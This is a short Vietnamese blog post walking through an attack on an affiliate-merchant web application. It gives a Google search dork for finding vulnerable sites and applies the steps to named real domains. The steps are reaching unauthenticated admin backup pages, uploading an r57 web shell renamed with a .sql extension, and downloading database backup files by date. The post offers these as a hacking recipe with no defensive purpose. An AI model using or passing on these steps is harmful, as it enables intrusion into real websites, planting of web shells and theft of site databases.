Thứ Tư, 1 tháng 7, 2015

Bug backup và cách khai thác

Posted By: Unknown - 17:28
Bug này khá nguy hiểm tuy cũ nhưng vẫn còn nhiều side dính .Google seach



Code:
allinurl: "index.php?Act=Merchants"
kết quả khá nhiều , thử con

Code:
http://www.zepub.com/index.php?Act=Merchants
Bây giờ ta thay index.php?Act=Merchants bằng /admin/dump


Code:
http://www.zepub.com/admin/dump
Ơ dính rồi kìa.Giữ lấy trang này bây giờ thử newtab và thay Nhớ lấy cái ngày thắng nó rất quan trọng đấy ./admin/dump bằng admin/backupstart.php coi nào

Hô hô ra cái j` thế này


Code:
http://www.zepub.com/admin/backupstart.php
Có chỗ upload kìa thử up con shell r57 lên coi thế nào. Chú ý đổi con shell thành r57.php.sql hoặc r57.sql tùy theo side mà thay. Con shell tớ up lên.


Code:
http://www.zepub.com/admin/dump/r57kilo.sql
Ơ kìa sao con shell lại như thế này nhỉ? Chả hiểu nổi , ai giải thích giùm với.

Thử cách khác vậy.
Thử down load cái nó back up coi ntn dùng /admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql

Code:
 http://www.affiliation01.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql
dd-mm-yyyy.sql thay bằng ngày tháng bạn thấy ở phía dưới

ok đến đây thôi nhé.
Filled Under

About Unknown

Organic Theme is officially developed by Templatezy Team. We published High quality Blogger Templates with Awesome Design for blogspot lovers.The very first Blogger Templates Company where you will find Responsive Design Templates.

0 nhận xét :

Đăng nhận xét

Đăng ký: Đăng Nhận xét ( Atom )

Copyright © 2015 IT Vui Vẻ

Designed by Templatezy & Copy Blogger Themes